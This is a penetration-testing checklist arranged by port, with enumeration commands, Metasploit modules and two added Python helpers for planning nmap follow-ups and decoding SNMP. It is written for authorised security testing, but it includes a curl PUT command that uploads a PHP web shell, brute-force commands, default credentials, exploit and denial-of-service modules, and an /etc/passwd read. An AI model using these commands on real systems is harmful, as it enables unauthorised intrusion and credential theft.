# Enumeration - Open Ports

**Checklist for Enumeration & Vulnerability Scanning for Common Open Ports:**
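The checklist below is organised by port. To drive it from a scan instead of by hand, the following added Python script (not part of the original checklist; the scan text is a constructed sample and the `FOLLOWUPS` table carries only a subset of the commands listed further down) parses nmap grepable (`-oG`) output, keeps the open ports, and prints the matching follow-up commands. UDP ports usually come back as `open|filtered`, so those are kept too.

```python
"""Map an nmap grepable (-oG) scan onto this page's per-port follow-ups.

Added example for this page, not a tool from the original author.  The scan
text below is constructed, and FOLLOWUPS only carries a few of the commands
listed in the checklist (extend it as you work down the list).
"""
import sys

# (port, protocol) -> follow-up commands from the checklist, with {ip} filled in
FOLLOWUPS = {
    (21, "tcp"):   ["nmap -p 21 -n -v -sV -Pn --script=ftp-anon,ftp-vsftpd-backdoor,ftp-proftpd-backdoor {ip}"],
    (22, "tcp"):   ["nmap -p 22 -n -v -sV -Pn --script ssh-hostkey,ssh-auth-methods --script-args ssh.user=root {ip}"],
    (25, "tcp"):   ["nmap -p 25 -n -v -sV -Pn --script=smtp-commands,smtp-enum-users {ip}"],
    (111, "tcp"):  ["rpcinfo -p {ip}", "showmount -e {ip}"],
    (139, "tcp"):  ["enum4linux -a {ip}"],
    (445, "tcp"):  ["enum4linux -a {ip}",
                    "nmap -p 445 -n -v -sV -Pn --script=smb-os-discovery,smb-enum-shares,smb-security-mode,smb-vuln* {ip}"],
    (161, "udp"):  ["snmp-check -t {ip} -c public", "snmpwalk -c public -v 1 {ip}"],
    (2049, "tcp"): ["showmount -e {ip}"],
    (3306, "tcp"): ["nmap -p 3306 -n -v -sV -Pn --script=mysql-info,mysql-empty-password {ip}"],
}

# UDP scans rarely prove "open"; treat open|filtered as worth a follow-up as well
OPEN_STATES = {"open", "open|filtered"}


def parse_grepable(text):
    """Return {ip: [(port, proto, state, service, version), ...]} for open ports.

    Each -oG port entry is port/state/proto/owner/service/rpcinfo/version/;
    nmap replaces any '/' inside the version string with '|', so splitting
    on '/' is safe.  "Status: Up" lines carry no Ports field and are skipped.
    """
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        if "Ports" not in fields:
            continue
        ip = fields["Host"].split()[0]
        entries = []
        for item in fields["Ports"].split(", "):
            parts = item.split("/")
            if len(parts) < 7:
                continue
            port, state, proto, _owner, service, _rpc, version = parts[:7]
            if state in OPEN_STATES:
                entries.append((int(port), proto, state, service, version))
        hosts.setdefault(ip, []).extend(entries)
    return hosts


def plan(hosts):
    """Expand open ports into a de-duplicated, ordered list of shell commands."""
    commands = []
    for ip, entries in hosts.items():
        for port, proto, _state, _service, _version in entries:
            for template in FOLLOWUPS.get((port, proto), []):
                cmd = template.format(ip=ip)
                if cmd not in commands:
                    commands.append(cmd)
    return commands


# Constructed sample of `nmap -sS -sU -p T:21,22,139,445,3306,U:161 -oG -` output
SAMPLE_SCAN = (
    "# Nmap 7.94 scan initiated (constructed sample)\n"
    "Host: 192.168.1.10 ()\tStatus: Up\n"
    "Host: 192.168.1.10 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH 7.4p1 (protocol 2.0)/, "
    "139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, "
    "3306/closed/tcp//mysql///, 161/open|filtered/udp//snmp///"
    "\tIgnored State: closed (0)\n"
)

if __name__ == "__main__":
    # `nmap ... -oG - | python3 plan.py`; with no piped input the sample scan is used
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_SCAN
    for cmd in plan(parse_grepable(text)):
        print(cmd)
```

Pipe a real scan in with `nmap -sS -sU -sV -oG - (ip) | python3 plan.py` and review the printed commands before running them; the brute-force entries on this page are deliberately left out of `FOLLOWUPS` so nothing noisy runs by accident.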

**Port: 7 ECHO**\
\
`nc -uvn (ip) 7`

**Port: 13 DAYTIME**

`nmap -p 13 -sV --script=daytime (ip)` (legacy service; of interest mainly as a DoS reflection vector, so report it rather than use it)

**Port: 21 FTP**

`nmap -p 21 -sV (ip)`\
`nmap -p 21 --script=ftp-* -d (ip)`\
`nmap --script=ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-anon,ftp-libopie,ftp-vuln-cve2010-4221 -p 21 -n -v -sV -Pn (ip)` (`tftp-enum` targets UDP/69, see TFTP below)\
\
`use auxiliary/scanner/ftp/anonymous`\
`use auxiliary/scanner/ftp/ftp_login`\
`use auxiliary/scanner/ftp/ftp_version`\
`use auxiliary/scanner/ftp/konica_ftp_traversal`

**Port: 22 SSH**

*Manual:*

`ssh (ip)`\
`ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 (ip)` (legacy servers that only offer an old key exchange)\
`ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c aes128-cbc (ip)` (legacy key exchange and cipher)\
\
`nmap -p 22 -n -v -sV -Pn --script ssh-auth-methods --script-args ssh.user=root (ip)` \
`nmap -p 22 -n -v -sV -Pn --script ssh-hostkey (ip)` \
`nmap -p 22 -n -v -sV -Pn --script ssh-brute --script-args userdb=user_list.txt,passdb=password_list.txt (ip)`\
\
`use auxiliary/scanner/ssh/fortinet_backdoor`\
`use auxiliary/scanner/ssh/juniper_backdoor`\
`use auxiliary/scanner/ssh/ssh_enumusers`\
`use auxiliary/scanner/ssh/ssh_identify_pubkeys`\
`use auxiliary/scanner/ssh/ssh_login`\
`use auxiliary/scanner/ssh/ssh_login_pubkey`\
`use auxiliary/scanner/ssh/ssh_version`

**Port: 23 TELNET**

`nmap -p 23 -sV (ip)`\
`nmap -p 23 --script=telnet-* (ip)`

**Port: 25 SMTP**

`nmap --script=smtp-enum-users,smtp-commands,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764,smtp-vuln-cve2010-4344 -p 25 -n -v -sV -Pn (ip)`\
\
`use auxiliary/scanner/smtp/smtp_enum`\
`use auxiliary/scanner/smtp/smtp_ntlm_domain`\
`use auxiliary/scanner/smtp/smtp_relay`\
`use auxiliary/scanner/smtp/smtp_version`

**Port: 43 Whois**\
\
`whois -h (host) -p (port) "example.com"`

**Port: 53 Domain**\
\
`nmap -Pn -p 53 --script=dns-nsid (ip)`

**Port: 69 TFTP**\
\
`nmap -Pn -sU -p69 -sV --script tftp-enum (ip)`\
`use auxiliary/admin/tftp/tftp_transfer_util`

**Port: 79 FINGER**\
\
`nc -vn (ip) 79`\
`echo "root" | nc -vn (ip) 79`\
`use auxiliary/scanner/finger/finger_users`

**Port: 80 HTTP**

`nikto -h http://(ip)/`\
\
*PHP sites, if `http-methods` reports PUT as allowed:*\
`curl -v -X PUT -d '<?php echo shell_exec($_GET["cmd"]); ?>' http://192.168.1.10/shell.php`\
\
`sqlmap -u http://(ip)/ --crawl=5 --dbms=mysql`\
\
`nmap -p 80 -n -v -sV -Pn --script http-backup-finder,http-config-backup,http-errors,http-headers,http-iis-webdav-vuln,http-internal-ip-disclosure,http-methods,http-php-version,http-qnap-nas-info,http-robots.txt,http-shellshock,http-slowloris-check,http-waf-detect,http-vuln* (ip)`

**Port: 81 HTTP** \
\
*VisualSVN Server:*\
`nmap -p 80,81,443 --script http-svn-info (ip)`\
\
**Port: 88 Kerberos**\
\
Check for `MS14-068` (CVE-2014-6324, Kerberos PAC validation flaw that lets any domain user forge a Domain Admin ticket)

**Port: 110 POP3**

`nmap -p 110,995 --script pop3-ntlm-info (ip)`\
`use auxiliary/scanner/pop3/pop3_version`

**Port: 111 RPCBIND**

`rpcinfo (ip)`\
`nmap -sSUC -p 111 (ip)`\
\
`use auxiliary/scanner/nfs/nfsmount`\
`use auxiliary/dos/rpc/rpcbomb` (denial of service; only if a DoS is in scope and an NFS service was found)

**Port: 113 Ident**\
\
`nc -vn (ip) 113`

**Port: 123 ntp**\
\
`nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 (ip)`

**Port: 135 Microsoft RPC**

`nmap -n -v -sV -Pn -p 135 --script=msrpc-enum (ip)`\
`rpcclient -U "" -N (ip)` (null session over SMB; then `srvinfo`, `enumdomusers`)\
\
*If the host also exposes SunRPC/NFS (see 111 and 2049):*\
`nmap -sV --script=nfs-* (ip)`\
`rpcinfo -p (ip)`\
`showmount -e (ip)`\
`mount -t nfs -o nolock 192.168.0.100:/home/machine /tmp/mnt`\
\
`use exploit/windows/dcerpc/ms05_017_msmq`

**Port: 139/445 SMB Service**

`nmap -n -v -sV -Pn -p 445 --script=smb-ls,smb-mbenum,smb-enum-shares,smb-enum-users,smb-os-discovery,smb-security-mode,smbv2-enabled,smb-vuln* (ip)`\
\
`enum4linux -a 192.168.1.10`\
`rpcclient -U "" 192.168.1.10`\
\
`(post commands : >srvinfo, >enumdomusers, >getdompwinfo)`\
\
`smbclient -L 192.168.1.10`\
`smbclient //192.168.1.10/ipc$ -U administrator`\
`smbclient //192.168.1.10/admin$ -U administrator`\
\
`use auxiliary/scanner/smb/psexec_loggedin_users`\
`use auxiliary/scanner/smb/smb_enumshares`\
`use auxiliary/scanner/smb/smb_enumusers`\
`use auxiliary/scanner/smb/smb_enumusers_domain`\
`use auxiliary/scanner/smb/smb_login`\
`use auxiliary/scanner/smb/smb_lookupsid`\
`use auxiliary/scanner/smb/smb_ms17_010`\
`use auxiliary/scanner/smb/smb_version`

**Port: 161/162 UDP SNMP Service**

`nmap -n -vv -sV -sU -Pn -p 161,162 --script=snmp-processes,snmp-netstat (ip)` \
`snmp-check -t 192.168.1.10 -c public` \
`snmpwalk -c public -v 1 192.168.1.10 1.3.6.1.4.1.77.1.2.25` (Windows user accounts; substitute any OID from the MIB table below) \
`hydra -P passwords.txt -v (ip) snmp`\
\
*Community strings to try:* `public`, `private`, `community`\
\
*SNMP MIB trees:*

| OID | Contents |
| --- | --- |
| `1.3.6.1.2.1.25.1.6.0` | System processes |
| `1.3.6.1.2.1.25.4.2.1.2` | Running programs |
| `1.3.6.1.2.1.25.4.2.1.4` | Process paths |
| `1.3.6.1.2.1.25.2.3.1.4` | Storage units |
| `1.3.6.1.2.1.25.6.3.1.2` | Software names |
| `1.3.6.1.4.1.77.1.2.25` | User accounts (Windows) |
| `1.3.6.1.2.1.6.13.1.3` | TCP local ports |

`use auxiliary/scanner/snmp/snmp_enum`\
`use auxiliary/scanner/snmp/snmp_enum_hp_laserjet`\
`use auxiliary/scanner/snmp/snmp_enumshares`\
`use auxiliary/scanner/snmp/snmp_enumusers`\
`use auxiliary/scanner/snmp/snmp_login`
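Everything in this section rests on one fact: in SNMPv1/v2c the community string is the only credential and it travels in cleartext in every UDP datagram, which is why guessing it with `hydra` or reading it off the wire works. The added example below (pure standard library, not from the original page; the target host and the `SAMPLE_REPLY` bytes are assumptions built locally, not a capture) hand-encodes an SNMPv1 GetRequest for `sysDescr.0` and decodes the GetResponse, so you can see exactly where `public` sits in the packet:

```python
"""SNMPv1 GetRequest/GetResponse by hand, showing the community string on the wire.

Added example for this page (not from the original author); standard library only.
The host/port in snmp_get are illustrative and SAMPLE_REPLY is constructed locally.
"""
import socket

SYS_DESCR = "1.3.6.1.2.1.1.1.0"   # sysDescr.0, the usual first probe


# ---- BER encoding ---------------------------------------------------------
def ber_len(n):
    """BER length: short form below 128, long form (0x80|N, then N bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, value):
    return bytes([tag]) + ber_len(len(value)) + value


def ber_int(v):
    """INTEGER, minimal two's-complement (the +8 keeps the sign bit clear for v >= 0)."""
    return tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))


def ber_oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128 with continuation bits."""
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        out.extend(reversed(chunk))
    return tlv(0x06, bytes(out))


def build_get_request(community, oid, request_id=1):
    """SNMPv1 message: SEQUENCE { version 0, community OCTET STRING, GetRequest-PDU [0] }."""
    varbind = tlv(0x30, ber_oid(oid) + tlv(0x05, b""))              # OID + NULL placeholder
    pdu = tlv(0xA0, ber_int(request_id) + ber_int(0) + ber_int(0)  # request-id, error-status, error-index
              + tlv(0x30, varbind))
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode()) + pdu)


# ---- BER decoding ---------------------------------------------------------
def read_tlv(buf, pos=0):
    """Return (tag, value, next_pos) for the TLV starting at buf[pos]."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def decode_oid(raw):
    arcs, acc = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))


def decode_value(tag, raw):
    if tag == 0x04:                                     # OCTET STRING
        return raw.decode("utf-8", "replace")
    if tag in (0x02, 0x41, 0x42, 0x43):                 # INTEGER, Counter32, Gauge32, TimeTicks
        return int.from_bytes(raw, "big", signed=(tag == 0x02))
    if tag == 0x06:
        return decode_oid(raw)
    return None                                         # NULL, noSuchObject, ...


def parse_response(pkt):
    """Decode a v1 GetResponse into community, request id, error status and (oid, value) pairs."""
    _, msg, _ = read_tlv(pkt)
    _, version, pos = read_tlv(msg)
    _, community, pos = read_tlv(msg, pos)              # plaintext: sniffable and guessable
    tag, pdu, _ = read_tlv(msg, pos)
    if version != b"\x00" or tag != 0xA2:
        raise ValueError("not an SNMPv1 GetResponse")
    _, rid, pos = read_tlv(pdu)
    _, err, pos = read_tlv(pdu, pos)
    _, _idx, pos = read_tlv(pdu, pos)
    _, vbl, _ = read_tlv(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vbl):
        _, vb, pos = read_tlv(vbl, pos)
        _, oid_raw, p = read_tlv(vb)
        vtag, vraw, _ = read_tlv(vb, p)
        varbinds.append((decode_oid(oid_raw), decode_value(vtag, vraw)))
    return {"community": community.decode(), "request_id": int.from_bytes(rid, "big", signed=True),
            "error_status": int.from_bytes(err, "big", signed=True), "varbinds": varbinds}


def snmp_get(host, community, oid=SYS_DESCR, port=161, timeout=2.0):
    """One GetRequest over UDP, reply decoded (needs a reachable agent; not used offline)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_get_request(community, oid, request_id=0x1234), (host, port))
        data, _ = s.recvfrom(4096)
    return parse_response(data)


# Constructed reply, as a v1 agent with community "public" would answer the request above
SAMPLE_REPLY = tlv(0x30, ber_int(0) + tlv(0x04, b"public") + tlv(
    0xA2, ber_int(1) + ber_int(0) + ber_int(0) + tlv(0x30, tlv(
        0x30, ber_oid(SYS_DESCR) + tlv(0x04, b"Linux target 5.4.0-generic x86_64")))))

if __name__ == "__main__":
    print(build_get_request("public", SYS_DESCR).hex())   # "public" is visible as 7075626c6963
    print(parse_response(SAMPLE_REPLY))
```

A wrong community string on a v1/v2c agent usually gets no reply at all rather than an error, which is what makes `hydra ... snmp` and `snmp_login` a timing-based guess; an `error_status` of 2 (`noSuchName`) in a decoded reply means the community was accepted but the OID is not implemented, so move on to the next tree in the table.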

**Port: 194, 6660-7000 IRC**\
\
`nc -vn (ip) 194`\
`openssl s_client -connect (ip):(port) -quiet`\
`nmap -sV --script=irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 (ip)`

**Port: 264 Checkpoint FW**\
\
`use auxiliary/gather/checkpoint_hostname`

**Port: 389/636 Ldap**\
\
`ldapsearch -h (ip) -p 389 -x -b "dc=mywebsite,dc=com"`\
\
`nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,ldap.qfilter=users,ldap.attrib=sAMAccountName' (ip)`\
\
`nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,ldap.qfilter=custom,ldap.searchattrib="operatingSystem",ldap.searchvalue="Windows Server",ldap.attrib={operatingSystem,whencreated,OperatingSystemServicePack}' (ip)`\
\
`nmap -sV --script "ldap* and not brute" (ip)` (anonymous bind, no credentials needed)

**Port: 443 HTTPS**

`sslscan (ip):443`\
\
`nmap -sV --script=ssl-heartbleed (ip)`

**Port: 500 IPSEC IKE/VPN**\
\
`ike-scan -M (ip)` \
`ike-scan -M --showbackoff (ip)`

**Port: 502 ModBus**\
\
`nmap --script modbus-discover -p 502 (ip)`

**Port: 512 Rexec**\
\
`nmap -p 512 --script rexec-brute (ip)`

**Port: 513 Rlogin**\
\
`nmap -p 513 --script rlogin-brute (ip)`\
`rlogin -l root (ip)`

**Port: 514 Rsh**\
\
`rsh (ip) <command>`

**Port: 548 AFP**\
\
`use auxiliary/scanner/afp/afp_server_info` \
`nmap -sV --script "afp-* and not dos and not brute" -p 548 (ip)`

**Port: 554 RTSP**\
\
Check for IP-Cameras\
`nmap -sV --script "rtsp-*" -p 554 (ip)`

**Port: 587 Submission**\
\
Mail submission port (outgoing SMTP, normally authenticated). If Postfix is running, check `CVE-2014-6271` (Shellshock).

**Port: 623 IPMI**\
\
`nmap -n -sU -p 623 (ip)` \
`use auxiliary/scanner/ipmi/ipmi_version` \
`use auxiliary/scanner/ipmi/ipmi_cipher_zero` \
`use auxiliary/scanner/ipmi/ipmi_dumphashes`\
\
*SuperMicro IPMI UPnP:*\
`use exploit/multi/upnp/libupnp_ssdp_overflow`

**Port: 631 CUPS**\
\
Check `http://ip:631/admin` & `http://ip:631/printers`

**Port: 873 Rsync**\
\
`nc -vn (ip) 873`\
`nmap -sV --script "rsync-list-modules" -p 873 (ip)` \
`use auxiliary/scanner/rsync/modules_list`

**Port: 902 (VMware Authentication Daemon Version)**\
\
`use auxiliary/scanner/vmware/vmauthd_login`\
`use auxiliary/scanner/vmware/vmauthd_version`\
`nmap -p 902 --script vmauthd-brute (ip)`

**Port: 1026 Rusersd**\
\
`rusers -l (ip)`

**Port: 1098/1099 Java RMI**\
\
`nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1098,1099 (ip)` \
\
`use auxiliary/scanner/misc/java_rmi_server` \
`use auxiliary/gather/java_rmi_registry`

**Port: 1433 MSSQL Service**

`nmap -n -v -sV -Pn -p 1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=passwords.txt (ip)` \
`nmap -n -v -sV -Pn -p 1433 --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password (ip)` \
`sqsh -S 192.168.1.10 -U sa` \
\
`use auxiliary/scanner/mssql/mssql_login`\
`use auxiliary/admin/mssql/mssql_exec`\
`use auxiliary/admin/mssql/mssql_enum`

**Port: 1521 ORACLE DB Service**

`nmap -n -v -sV -Pn -p 1521 --script=oracle-enum-users --script-args sid=ORCL,userdb=users.txt (ip)`\
`nmap -n -v -sV -Pn -p 1521 --script=oracle-sid-brute (ip)` \
`tnscmd10g version -h 192.168.1.10` \
`tnscmd10g status -h 192.168.1.10`\
\
`use auxiliary/scanner/oracle/emc_sid`\
`use auxiliary/scanner/oracle/oracle_login`\
`use auxiliary/scanner/oracle/sid_brute`\
`use auxiliary/scanner/oracle/sid_enum`\
`use auxiliary/scanner/oracle/tnslsnr_version`\
`use auxiliary/scanner/oracle/tnspoison_checker`

**Port: 1720 H.323 Network (Voip)**

`use auxiliary/scanner/h323/h323_version`

**Port: 2000 Cisco-sccp**\
\
`telnet (ip) 2000`

**Port: 2049 NFS**\
\
`showmount -e 192.168.1.100`\
`mount 192.168.1.100:/ /tmp/NFS`\
`mount -t nfs -o nolock 192.168.1.100:/ /tmp/NFS`

**Port: 2100 Oracle XML DB**\
\
Access through ftp -  Default logins: `sys:sys scott:tiger`

**Port: 2181 ZOOKEEPER**

`nc (ip) 2181`

**Port: 3097 Chunghwa Telecom Data**\
\
`nc (ip) 3097`\
*After connecting with netcat, post-exploitation:*\
`misc script /etc/passwd`

**Port: 3306 MYSQL Service**

`nmap -n -v -sV -Pn -p 3306 --script=mysql-info,mysql-audit,mysql-enum,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-users,mysql-query,mysql-variables,mysql-vuln-cve2012-2122 (ip)` \
\
`mysql --host=192.168.1.10 -u root -p`\
\
`use auxiliary/scanner/mysql/mysql_authbypass_hashdump`\
`use auxiliary/scanner/mysql/mysql_login`\
`use auxiliary/scanner/mysql/mysql_schemadump`\
`use auxiliary/scanner/mysql/mysql_version`\
`use auxiliary/scanner/mysql/mysql_writable_dirs`

**Port: 3389 RDP**

`ncrack -vv --user administrator -P passwords.txt rdp://192.168.1.10,CL=1` (`CL=1` limits ncrack to one connection at a time, which RDP services usually require)\
`rdesktop -u guest -p guest (ip) -g 94%`\
`rdesktop 192.168.1.10`

`use auxiliary/scanner/rdp/ms12_020_check`\
`use auxiliary/scanner/rdp/rdp_scanner`

**Port: 4369 EPMD**\
\
`nmap -sV -Pn -n -T4 -p 4369 --script epmd-info (ip)` \
`use exploit/multi/misc/erlang_cookie_rce`

**Port: 4445 Upnotifyp**\
\
Check with netcat and browser

**Port: 4555 RSIP**\
\
Apache James remote administration service. Check for `CVE-2015-7611` (James 2.3.2 command execution; default credentials `root:root`)

**Port: 5060 and 5061 (SIP Enabled Devices - VOIP)**

`use auxiliary/scanner/sip/enumerator` \
`nmap --script=sip-enum-users -sU -p 5060 (ip)`

**Port: 5353 mDNS**\
\
`nmap -Pn -sUC -p5353 (ip)`

**Port: 5432/5433 PostgreSQL**\
\
`use auxiliary/scanner/postgres/postgres_version` \
`use auxiliary/scanner/postgres/postgres_dbname_flag_injection` \
`use auxiliary/scanner/postgres/postgres_hashdump` \
`use auxiliary/scanner/postgres/postgres_schemadump` \
`use auxiliary/admin/postgres/postgres_readfile` \
`use exploit/linux/postgres/postgres_payload` \
`use exploit/windows/postgres/postgres_payload`

**Port: 5671/5672 AMQP**\
\
`nmap -sV -Pn -n -T4 -p 5672 --script amqp-info (ip)`

**Port: 5800/5801 VNC**\
\
`nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p (port) (ip)` \
\
`use auxiliary/scanner/vnc/vnc_none_auth`

**Port: 5900 VNC**\
\
`vncviewer (ip)`\
\
`use auxiliary/scanner/vnc/vnc_login`\
`use auxiliary/scanner/vnc/vnc_none_auth`

**Port: 6000 X11** (6000-6063; the display number is added to 6000)\
\
`nmap -Pn -A -p 6000 --script=x11-access (ip)`  (unauthenticated access)

**Port: 7552 Microsoft Terminal Service** (RDP on a non-default port; the rdp scripts target 3389 unless the port is given)\
\
`nmap -sV -p 7552 --script rdp-ntlm-info (ip)`\
`nmap -sV -p 7552 --script=rdp-vuln-ms12-020 (ip)` \
`nmap -sV -p 7552 --script rdp-enum-encryption (ip)`

**Port: 8009 Apache JServ Protocol (AJP)**\
\
`nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -p 8009 (ip)`

**Port:8014,8443,8445,9090 (Symantec Endpoint Protection Manager)**\
\
`default credentials`\
`use exploit/windows/http/sepm_auth_bypass_rce`\
`https://www.exploit-db.com/exploits/31853`

**Port: 8400 Commvault cvd**

`use exploit/windows/misc/commvault_cmd_exec`

**Port: 10000 Ndmp**\
\
*Symantec/Veritas Backup Exec ndmp (NDMPv3):*\
`use exploit/windows/backupexec/ssl_uaf`


